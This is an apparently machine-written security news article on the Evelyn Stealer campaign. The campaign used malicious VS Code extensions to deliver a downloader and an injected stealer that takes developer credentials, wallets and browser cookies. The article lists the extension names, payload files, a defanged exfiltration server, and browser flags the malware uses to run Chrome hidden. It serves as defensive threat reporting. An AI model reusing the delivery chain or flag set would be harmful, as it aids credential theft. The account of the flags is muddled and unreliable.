Ethical Hacking News
The Evelyn Stealer malware: a new threat to developer security, targeting software developers with a sophisticated campaign designed to exfiltrate sensitive user data.
The Evelyn Stealer malware campaign targets software developers using the Microsoft Visual Studio Code (VS Code) extension ecosystem. The malware exfiltrates sensitive information, including developer credentials and cryptocurrency-related data, from compromised developer environments. The initial vector involved three VS Code extensions, which led to the deployment of a malicious downloader DLL called "Lightshot.dll." The malware injects a main stealer payload into a legitimate Windows process called "grpconv.exe" and harvests sensitive data. The malware collects clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, system information, and browser credentials. The malware implements safeguards to detect analysis and virtual environments, including terminating active browser processes using specific command-line flags. The emergence of Evelyn Stealer highlights the growing threat landscape of information stealers among attackers. Organizations should remain vigilant and take proactive steps to protect their users' sensitive information in light of this new threat.
The cybersecurity landscape has recently been plagued by a new and highly sophisticated malware campaign, dubbed "Evelyn Stealer," which has been discovered by researchers at Trend Micro. This malicious software (malware) has been designed specifically to target software developers who rely on the popular Microsoft Visual Studio Code (VS Code) extension ecosystem for their work.
According to the research conducted by Trend Micro, the Evelyn Stealer malware is capable of exfiltrating sensitive information from compromised developer environments, including developer credentials and cryptocurrency-related data. This malicious activity is particularly concerning as it can be used as a means of accessing broader organizational systems, providing an entry point for attackers.
It appears that the initial vector for this attack involved three VS Code extensions - BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme - which ultimately led to the deployment of a malicious downloader DLL called "Lightshot.dll." This DLL was responsible for launching a hidden PowerShell command to fetch and execute a second-stage payload called "runtime.exe."
Upon further investigation, researchers discovered that the executable payload would decrypt and inject the main stealer payload into a legitimate Windows process called "grpconv.exe" directly in memory. From this position of power, the malware was able to harvest sensitive data and exfiltrate it to a remote server called "server09.mentality[.]cloud" via FTP in the form of a ZIP file.
Some of the information that was collected by the Evelyn Stealer malware included clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, system information, credentials and stored cookies from Google Chrome and Microsoft Edge.
Furthermore, it has been revealed that the malware implements safeguards to detect analysis and virtual environments. In order to prevent potential interference with the data collection process, active browser processes were terminated using specific command-line flags set for detection and forensic traces.
These flags included:
--headless=new, to run in headless mode
--disable-gpu, to prevent GPU acceleration
--no-sandbox, to disable browser security sandbox
--disable-extensions, to prevent legitimate security extensions from interfering
--disable-logging, to disable browser log generation
--silent-launch, to suppress startup notifications
--no-first-run, to bypass initial setup dialogs
--disable-popup-blocking, to ensure malicious content can execute
--window-position=-10000,-10000, to position the window off-screen
--window-size=1,1, to minimize window to 1x1 pixel
The emergence of this malware campaign highlights an important concern within the developer community. It reflects the operationalization of attacks against software developers who play a crucial role in the software development ecosystem.
Trend Micro noted that the Evelyn Stealer malware is just one example of a growing threat landscape, which sees information stealers - specifically malicious software designed to exfiltrate sensitive user data - gaining traction among attackers.
In light of this new threat, cybersecurity researchers have cautioned that organizations relying on software developers and those with access to production systems, cloud resources, or digital assets should remain vigilant. By recognizing the risks posed by Evelyn Stealer and other similar malware campaigns, these organizations can take proactive steps to protect their users' sensitive information.
The case of Evelyn Stealer serves as a stark reminder of the importance of vigilance within the cybersecurity community. As threats evolve and become more sophisticated, it is crucial for developers, researchers, and organizations alike to stay informed about emerging risks and vulnerabilities.
In conclusion, the Evelyn Stealer malware campaign presents a significant threat to developer security, highlighting the need for greater awareness and proactive measures to safeguard sensitive information. By staying vigilant and taking steps to mitigate these threats, we can ensure a safer online environment for all users.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evelyn-Stealer-Malware-A-New-Threat-to-Developer-Security-ehn.shtml
https://thehackernews.com/2026/01/evelyn-stealer-malware-abuses-vs-code.html
Published: Tue Jan 20 07:32:21 2026 by llama3.2 3B Q4_K_M
